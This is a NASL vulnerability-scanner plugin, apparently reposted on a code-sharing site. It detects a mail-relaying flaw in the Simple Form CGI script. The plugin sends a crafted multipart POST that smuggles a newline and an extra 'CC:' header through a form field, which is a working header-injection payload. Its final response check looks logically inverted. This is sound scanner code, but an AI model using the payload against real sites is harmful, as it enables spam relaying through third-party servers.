simple_form_mail_relaying_via_subject_tags.nasl

来自「漏洞扫描源码,可以扫描linux,windows,交换机路由器」· NASL 代码 · 共 158 行

NASL
158
字号
## This script was written by George A. Theall, <theall@tifaware.com>.## See the Nessus Scripts License for details.#if (description) {  script_id(14713);  script_version("$Revision: 116 $");# script_cve_id("CVE-MAP-NOMATCH");# NOTE: no CVE id assigned (gat, 09/2004)  name["english"] = "Simple Form Mail Relaying via Subject Tags Vulnerability";  script_name(english:name["english"]);   desc["english"] = "The target is running at least one instance of Simple Form which failsto remove newlines from variables used to construct message headers. A remote attacker can exploit this flaw to add to the list ofrecipients, enabling him to use Simple Form on the target as a proxyfor sending abusive mail or spam. See also : http://worldcommunity.com/opensource/utilities/simple_form.htmlSolution : Upgrade to Simple Form 2.3 or later.Risk factor : High";  script_description(english:desc["english"]);   summary["english"] = "Checks for Mail Relaying via Subject Tags Vulnerability in Simple Form";  script_summary(english:summary["english"]);   script_category(ACT_ATTACK);  script_copyright(english:"This script is Copyright (C) 2004 George A. Theall");  family["english"] = "CGI abuses";  script_family(english:family["english"]);  script_dependencie("global_settings.nasl", "http_version.nasl");  script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning");  exit(0);}include("global_settings.inc");include("http_func.inc");include("http_keepalive.inc");host = get_host_name();port = get_http_port(default:80);if (debug_level) display("debug: searching for mail relaying via subject tags vulnerability in Simple Form on ", host, ":", port, ".\n");if (!get_port_state(port)) exit(0);# Check for the form in each of the CGI dirs.foreach dir (cgi_dirs()) {   if (  is_cgi_installed_ka(item:dir + "/s_form.cgi", port:port) )   {  url = string(dir, "/s_form.cgi");  if (debug_level) display("debug: checking ", url, "...\n");  # Exploit the form and *preview* the message to determine if the  # vulnerability exists. Note: this doesn't actually inject a   # message but should give us an idea if it is vulnerable.  #  # nb: preview mode won't actually show the modified subject so we  #     check whether we have a vulnerable version by trying to set  #     preview_response_title -- if we can, we're running a   #     non-vulnerable version.  boundary = "bound";  req = string(    "POST ",  url, " HTTP/1.1\r\n",    "Host: ", host, "\r\n",    "Referer: http://", host, "/\r\n",    "Content-Type: multipart/form-data; boundary=", boundary, "\r\n"    # nb: we'll add the Content-Length header and post data later.  );  boundary = string("--", boundary);  postdata = string(     boundary, "\r\n",     'Content-Disposition: form-data; name="form_response_title"', "\r\n",    "\r\n",    "A Response\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="form_return_url"', "\r\n",    "\r\n",    "http://", host, "/\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="form_return_url_title"', "\r\n",    "\r\n",    "Home\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="form_fields"', "\r\n",    "\r\n",    "msg\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="required_fields"', "\r\n",    "\r\n",    "msg\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="form_email_subject"', "\r\n",    "\r\n",    "OpenVAS Plugin Test:!:xtra_recipients:!:\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="subject_tag_field"', "\r\n",    "\r\n",    "xtra_recipients\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="xtra_recipients"', "\r\n",    "\r\n",    "\nCC: victim@example.com\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="msg"', "\r\n",    "\r\n",    "This is a mail relaying test.\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="preview_data"', "\r\n",    "\r\n",    "yes\r\n",    boundary, "\r\n",     'Content-Disposition: form-data; name="preview_response_title"', "\r\n",    "\r\n",    "OpenVAS Plugin Preview",    boundary, "--", "\r\n"  );  req = string(    req,    "Content-Length: ", strlen(postdata), "\r\n",    "\r\n",    postdata  );  if (debug_level) display("debug: sending =>>", req, "<<\n");  res = http_keepalive_send_recv(port:port, data:req);  if (res == NULL) exit(0);           # can't connect  if (debug_level) display("debug: received =>>", res, "<<\n");  # Look at the preview and see whether we get *our* preview_response_title.  if (    res >< "OpenVAS Plugin Test:!:xtra_recipients:!:" &&     res >!< "OpenVAS Plugin Preview"  ) {    security_hole(port);    exit(0);  } }}

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?